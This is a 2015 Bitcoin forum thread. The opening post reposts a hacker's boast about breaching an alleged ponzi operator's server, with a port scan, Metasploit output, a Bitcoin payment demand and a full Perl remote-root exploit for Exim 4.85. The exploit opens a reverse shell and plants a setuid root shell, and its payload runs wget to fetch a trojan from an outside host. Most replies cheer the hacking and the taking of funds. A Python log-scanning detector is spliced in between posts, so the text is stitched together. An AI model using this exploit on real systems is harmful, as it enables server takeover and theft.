EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 06:06:58 AM |
|
Look at this:

hehe i told u don't fucking play with me ! where is u "ponzi" now ? some infos to public http://pastebin.com/VGcARfGe

PORT      STATE   SERVICE     VERSION
21/tcp    open    ftp         Pure-FTPd
22/tcp    open    ssh         OpenSSH 5.3 (protocol 2.0)
26/tcp    closed  rsftp
53/tcp    open    tcpwrapped
80/tcp    open    http        nginx
110/tcp   open    pop3        Dovecot pop3d
143/tcp   open    imap        Dovecot imapd
443/tcp   open    http        nginx
465/tcp   open    ssl/smtp    Exim smtpd 4.85
993/tcp   open    ssl/imap    Dovecot imapd
995/tcp   open    ssl/pop3    Dovecot pop3d
3306/tcp  open    mysql       MySQL (unauthorized)
8080/tcp  closed  http-proxy

nice 465/tcp open ssl/smtp Exim smtpd 4.85

code of exploit in perl:

#Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; }
$|=1;
$trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');
while(<$sock>) { print; if ($_ =~ /220 /) { last;} }
print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} }
if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; }
$vv .= "(" . $helohost . ")";
$from = "root\@local.com"; $to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256; $logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16); $logbuffer_size -= 3;
for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; }
$hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; }
$v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; }
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n";
while(1){};

msf core...

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\

http://metasploit.pro

Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]]
+ -- --=[ 1389 exploits - 788 auxiliary - 223 post ]
+ -- --=[ 356 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search Exim
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                   Disclosure Date  Rank       Description
----                                   ---------------  ----       -----------
exploit/linux/smtp/exim4_dovecot_exec  2015-01-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/exim4_string_format  2013-12-07       excellent  Exim4 string_format Function Heap Buffer Overflow

msf >

some screenshot some problem if u have

i can't withdraw all here

admin@money10.net
admin@14daily.com
admin@bitcoinfield.net
admin@profit12.com
admin@lucrebit.com

welcome speedy1987 in me world
don't searching me i have 20 firewall 10 nat and 5 vps hahah.
now u all can't withdraw u money but if u don't have skills...
this is public address BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk
i can't withdraw u all people money just put here 0.5 btc ist promotion !
now i go to sleep good night all !
Greetings ! polish elite hacker team
|
|
|
|
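Seen from the mail server's side, the script in the post above leaves a recognisable trace: an oversized message is rejected with a "message too big" entry, and one of the logged headers carries repeated `${run{...}}` expansion items. The sketch below is an added example, not part of the thread; it scans reject-log text for that combination. The entry layout is assumed to follow the `$logbuffer` template in the posted script, and the sample log, addresses and function name are constructed.

```python
import re

# Entry layout assumed from the $logbuffer template in the posted script:
# "<date> <time> <msg-id> rejected from <sender> H=<helo> [<ip>]: message too big: ..."
REJECT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<msg_id>\S+) rejected from "
    r"<(?P<sender>[^>]*)> H=(?P<helo>.*?) \[(?P<ip>[^\]]+)\]: "
    r"message too big: read=(?P<read>\d+) max=(?P<max>\d+)$"
)
# Exim string-expansion item that runs a command; it has no business in a mail header.
RUN_ITEM_RE = re.compile(r"\$\{run\s*\{")


def scan_reject_log(text):
    """Return 'message too big' rejections whose logged headers contain ${run{...}}."""
    entries, current = [], None
    for line in text.splitlines():
        m = REJECT_RE.match(line)
        if m:
            # Start of a new rejection entry.
            current = dict(m.groupdict(), headers=0, run_items=0)
            entries.append(current)
        elif current is not None and line.startswith(" "):
            # Indented lines are the headers logged with the rejected message.
            current["headers"] += 1
            current["run_items"] += len(RUN_ITEM_RE.findall(line))
        elif not line.startswith("Envelope-"):
            # Anything else ends the current entry.
            current = None
    return [e for e in entries if e["run_items"] > 0]


# Constructed sample: one ordinary oversize rejection, one matching the pattern.
# The command inside ${run{...}} is a harmless placeholder.
SAMPLE_LOG = "\n".join([
    "2015-05-05 06:00:01 1YpXyz-0001Ab-2C rejected from <alice@example.org> "
    "H=mail.example.org [198.51.100.7]: message too big: read=52700000 max=52428800",
    "Envelope-from: <alice@example.org>",
    "Envelope-to: <bob@example.net>",
    "  Subject: quarterly video",
    "2015-05-05 06:01:13 1YpXzA-0001Ac-3D rejected from <root@local.com> "
    "H=(abcde.com) [192.0.2.10]: message too big: read=52690944 max=52428800",
    "Envelope-from: <root@local.com>",
    "Envelope-to: <postmaster@localhost>",
    "  Header0000: " + "V" * 128,
    "  HeaderX: ${run{/bin/true}} ${run{/bin/true}} ${run{/bin/true}}",
])

if __name__ == "__main__":
    for hit in scan_reject_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} helo={hit['helo']} "
              f"read={hit['read']} max={hit['max']} run_items={hit['run_items']}")
```

An ordinary oversize rejection is not reported; only entries whose logged headers contain an expansion item are returned, together with the connecting IP for follow-up.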
Dotakels
|
|
May 05, 2015, 06:16:41 AM |
|
Good job. Hackers should do that. Always so that there's no people will scam but. The hackers get back the scammers scammed to its owner? I think he should do that so that being hacker will have a sense.
|
|
|
|
louise123
|
|
May 05, 2015, 07:47:24 AM |
|
Serves him right. Don't do to others, what you do not want done to you. Karma is a b*tch isn't it
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 07:54:33 AM |
|
Serves him right. Don't do to others, what you do not want done to you. Karma is a b*tch isn't it
Yeah, when I heard that he was hacked I thought yeshh, finally he gets what he deserves!
|
|
|
|
gogxmagog
Legendary
Offline
Activity: 1456
Merit: 1010
Ad maiora!
|
|
May 05, 2015, 07:57:37 AM |
|
Awesome job 5m4ru1 this made my day! I hope you can find time to nail more of these scammers, check the securities section for plenty of deserving victims! The amount of scammers in Bitcoin, you could be very busy, but very very rich too! Please do make a habit of this LOL
|
|
|
|
louise123
|
|
May 05, 2015, 08:10:15 AM |
|
Awesome job 5m4ru1 this made my day! I hope you can find time to nail more of these scammers, check the securities section for plenty of deserving victims! The amount of scammers in Bitcoin, you could be very busy, but very very rich too! Please do make a habit of this LOL
Yeah, definitely make a habit out of this. And if you don't mind, I would like to suggest that your next target be Mark Karpeles. Return those coins to the Goxxed LOL!
|
|
|
|
favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
|
|
May 05, 2015, 08:27:35 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
|
|
|
|
Nick Markus
Newbie
Offline
Activity: 42
Merit: 0
|
|
May 05, 2015, 08:33:19 AM |
|
Hahah! Nice. That is what he deserved.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 08:35:49 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
|
|
|
|
Dotakels
|
|
May 05, 2015, 10:21:56 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 10:24:52 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
I don't know if he keeps it, I think he keeps 0.5 btc and gives the rest to the investors.
|
|
|
|
favdesu
Legendary
Offline
Activity: 1764
Merit: 1000
|
|
May 05, 2015, 10:28:02 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
I don't know if he keeps it, I think he keeps 0.5 btc and gives the rest to the investors.
He should've just donated it. Gamblers got what they deserve for supporting an obvious scam
|
|
|
|
Dotakels
|
|
May 05, 2015, 10:31:07 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
I don't know if he keeps it, I think he keeps 0.5 btc and gives the rest to the investors.
He buys bitcoins using the scammer's money and shares it with the investors? So you mean this hacker is using bitcoin?
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 10:41:39 AM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
I don't know if he keeps it, I think he keeps 0.5 btc and gives the rest to the investors.
He buys bitcoins using the scammer's money and shares it with the investors? So you mean this hacker is using bitcoin?
I really don't know what he is going to do with these bitcoins. I think it is good that a scammer gets hacked.
|
|
|
|
crazyivan
Legendary
Offline
Activity: 1652
Merit: 1007
DMD Diamond Making Money 4+ years! Join us!
|
|
May 05, 2015, 12:11:34 PM |
|
Very nice. Scammer got what he deserved.
KARMA it is.
|
|
|
|
jdebunt
Legendary
Offline
Activity: 1596
Merit: 1010
|
|
May 05, 2015, 12:31:24 PM |
|
*standing belly clap* I like your approach
|
|
|
|
alesx.onfire
|
|
May 05, 2015, 05:16:21 PM |
|
I don't understand the history
Who was scamming?
|
|
|
|
nor9865
|
|
May 05, 2015, 07:04:08 PM |
|
Who was the original scammer? Also. To scam a scammer is ok? Wow. I know the logic behind it is true, but damn. A scammer is a scammer.
|
|
|
|
EarnBtcFaucet (OP)
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 07:05:48 PM |
|
Who was the original scammer? Also. To scam a scammer is ok? Wow. I know the logic behind it is true, but damn. A scammer is a scammer.
The scammer is hacked, not scammed. It is up to the hacker if he pays everyone his investment.
|
|
|
|
Dotakels
|
|
May 05, 2015, 07:17:08 PM |
|
now this is interesting. could someone tell the story behind this scammer please?
Speedy1987 made an investment scam website. He made over 3000$ from scam, but now he has been hacked and the scammed money is now the property of the hacker.
Did he give it to charities or to someone who was scammed by these people? Or did he keep it as his money? It's better to share it.
I don't know if he keeps it, I think he keeps 0.5 btc and gives the rest to the investors.
He buys bitcoins using the scammer's money and shares it with the investors? So you mean this hacker is using bitcoin?
I really don't know what he is going to do with these bitcoins. I think it is good that a scammer gets hacked.
But it's better to share it because he stole it, even if he stole it from the person who also stole that money. It's ok to steal money from a scammer, but share it so that being a scammer will have a sense.
|
|
|
|
|